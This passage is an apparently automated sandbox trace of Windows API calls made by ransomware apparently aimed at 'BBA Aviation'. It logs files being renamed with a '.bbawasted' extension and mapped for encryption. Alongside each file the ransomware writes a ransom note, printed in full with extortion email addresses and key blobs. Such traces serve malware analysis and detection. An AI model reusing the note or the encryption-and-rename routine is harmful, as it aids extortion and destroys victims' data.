lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.840] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0160.840] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.840] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.840] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0160.841] WriteFile (in: hFile=0x290, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.842] SetEndOfFile (hFile=0x290) returned 1 [0160.842] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.842] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.bbawasted")) returned 1 [0160.843] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.844] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0160.844] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x151aa [0160.844] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x151aa) returned 0x630000 [0160.844] CloseHandle (hObject=0x28c) returned 1 [0160.905] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.905] CloseHandle (hObject=0x288) returned 1 [0160.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.905] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0160.906] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.906] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.906] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0160.907] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0160.907] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.918] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.918] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.918] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.918] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ahXgsB6vLQvm7VqhBYsiThH3xVTtekvn9b4+I6aUdcDRq5xYWbOMnipjeU6Nzx2b\r\nvfZZmG6MyUBM/HqDouzOXAa8cQ+EY6YDkmIs3DtFBI90Fw0DeMvt+uerWSS1tvAz\r\nPBWoViBAqghmo9NjHCJYBM1VSGN5KdxqDVAgj//eAvy3MdbObAzY1P9HbWZ6WSaV\r\n62Zf/5tFqWKm98zW6IwRovnCm7Jx968LOdBrTnOf2d2mXke7PqNIJUPXQcXtkfu1\r\nDPzFG8DuSKEYqRhxrHolnIYrkENeTVbVRerjTPgoGlANNf7RFJo+Z1BNJqLuFOPi\r\n+81FJ20Jbqg7qXpHQOTgavMnMvJi7WzpK0FXmBbQrXOgRbsEbdrvoJ1srSduzowO\r\n2aUfdkkxH1kfmDxcVxzmQsKPBogxmgzHvF8I83vCk1wk8e/yAHX5yz66alNclKru\r\nU9rRaX//YxXDFt/rGc6d+afW9JqiUJINouFVH67etxOi1l7q1OgxgUFKRlg4mKQQ\r\np+Makx70Cn9x7Wk+BMkDbCRRBgCkUyQkMSF/G48UCtCRW02yd9E6JxcTOYDdrU5P\r\ndOv05bPH4NLqfZQKcqSENqmGq3R3mZCv0SvAHYqlTTSct6s//WpKon8poZoYNifm\r\nUeT2RAUZqTon2UVYk37m1wOxcpr8CMQOFpxgquEtzfI=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.918] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.918] WriteFile (in: hFile=0x290, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0160.918] SetEndOfFile (hFile=0x290) returned 1 [0160.921] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.921] CloseHandle (hObject=0x290) returned 1 [0160.931] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0160.931] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a10d8 | out: hHeap=0x660000) returned 1 [0160.931] _aulldvrm () returned 0x0 [0160.931] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0160.932] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0160.932] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.932] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 48 [0160.932] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0160.932] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.932] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.932] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0160.933] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.933] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.933] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0160.938] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.939] SetEndOfFile (hFile=0x288) returned 1 [0160.940] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.940] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.bbawasted")) returned 1 [0160.943] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.944] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0160.944] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x138bc [0160.944] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x138bc) returned 0x640000 [0160.944] CloseHandle (hObject=0x28c) returned 1 [0161.014] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0161.015] CloseHandle (hObject=0x280) returned 1 [0161.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.015] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.016] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.016] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.016] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.016] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.016] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.028] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Cv+idq1hVNayZcTkUrDyhGz536CBKjIkdtpC45i6H1EcyqV2DzerhqvDwy4eAEmy\r\np01UNu9osRlD7xT5xNYNyhK/DnFQmbhfk3SFTFzDJHYOdg3oqSyndLWi9e6PjE8j\r\nokAycBszH1B+XLm+pyHiZALRxyRx+ZYksQa/xK3sMkiYAL0ohQTIGwidHj3ASleS\r\nWZMUkfXj8EWBn7C9gXQqdVKwtxROwGZDe3MieeRaAld0Tp9W49KkQV+oHU++A9hC\r\n7CfIXSsIlijNf3RfB+7x9H6Xy+9cd0YassCGmH9mcvVXuNzQrPPRm9qsolriD9rk\r\npg+DQ1JpbT/FJl2f+5ChAI/Jear6WW6RB3k8C7bMDYqoM6TVk5VZvhWgUt5GDPVk\r\nx7cm5oOM/szB3RXP69/GMv3GVYzQHkDkjadKirt72nayMj0wk54Nm1Lp686AR7cD\r\nlm3O2h87y/9Op7hvXctfmU/z/rxnzbwrz8G8q1LE+LeqgcIxiTSvl1+Q+XjESziY\r\nseO43sqCqgiWBFnw1XOma5sxDwitWxrNCDtiQkVWnYGSEuSPY8Mfw3FS/tcowl8m\r\nB4FDLndanQIAycmpURB3jY4dLnYK1+2Xt6rwZDggTGgMPtxFZLQFf+SCfHoFjaQt\r\ndgOPcwrgveIlSrIYKrr2I2uuFItJgvxys4CLeBl3j0h=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.028] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.028] WriteFile (in: hFile=0x288, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.028] SetEndOfFile (hFile=0x288) returned 1 [0161.031] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.031] CloseHandle (hObject=0x288) returned 1 [0161.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1240 | out: hHeap=0x660000) returned 1 [0161.033] _aulldvrm () returned 0x0 [0161.033] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.034] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.034] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.034] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 48 [0161.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.034] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.034] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.034] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0161.034] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.035] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.066] WriteFile (in: hFile=0x27c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.067] SetEndOfFile (hFile=0x27c) returned 1 [0161.067] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.068] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.bbawasted")) returned 1 [0161.068] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0161.069] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0161.069] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10a82 [0161.069] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a82) returned 0x640000 [0161.069] CloseHandle (hObject=0x294) returned 1 [0161.084] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0161.085] CloseHandle (hObject=0x290) returned 1 [0161.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.085] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.086] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.086] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.086] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.087] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.087] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.098] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Os5kq2lWYhPpK0/Yz3wJqRq8/86jLjhnwATH9kpMTRNSrFLA2FzSLv87yBBrfuVp\r\ndXLLGXwiSbgHd+aIDzhW+fzsFOZcmUsVHJIVBbC8LmmhStRJlo61ZI6ZjUhxpoL5\r\nQD4QK85kor2TrOAbjMT0eaGEQBeUTwPeAfPzVQEVovYHCDpUlHTatE3GkjH/MtUX\r\nr5DXhtuJKdFPFCeOMB2Iu/Ab/QScElNV3ZfGqNLyKIm8QgaIly341czF8pa+/PFe\r\n7p1QYkn1cIAvuLHlw9/h2CVrIw7G7OSplZkK4C59lwYdX3dasT1CX7uo7m1lN3uA\r\ngbjfWvfiu4LStnPUPuoweIhXfvu5Gm8h6AFTgOWjOZhMh8R7rdpf9h8/6jX8qWs6\r\nV1iY3w3g+/p6EL3UEyEXrgcL7pcIebCZkAeKYq1q3AnNekCN7d5wS4wjrvz9j4wU\r\nfbW77M+5A2esoezA/kRrscll2eS8MFvvJb64LWLmg8QRXAJzWIak3zuIn35wtc6n\r\nBJbneFlAjograCsZVGVYFnwwWVHJvnKSqUYZ+yvGVhSK3ZjvYMKa6QMMLhf5+Obl\r\n2uboqaAAzEye1iz4PQdX007HxLjMbrVvcb34PZSXFectqXb7zJJBkuCSRgiw5OVH\r\noRK94HH8TVS6ngcprW49HejwLsxHpLUfgL+hckZWU6R=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.098] WriteFile (in: hFile=0x27c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.170] SetEndOfFile (hFile=0x27c) returned 1 [0161.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.173] CloseHandle (hObject=0x27c) returned 1 [0161.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a13a8 | out: hHeap=0x660000) returned 1 [0161.175] _aulldvrm () returned 0x0 [0161.175] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.175] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.176] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.176] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 39 [0161.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0161.176] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.176] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.177] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0161.177] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.177] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.179] WriteFile (in: hFile=0x27c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.181] SetEndOfFile (hFile=0x27c) returned 1 [0161.181] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.181] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted")) returned 1 [0161.182] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0161.182] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0161.182] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x318f [0161.182] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x318f) returned 0x630000 [0161.182] CloseHandle (hObject=0x28c) returned 1 [0161.186] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.186] CloseHandle (hObject=0x280) returned 1 [0161.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.186] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.187] CryptGenRandom (in: 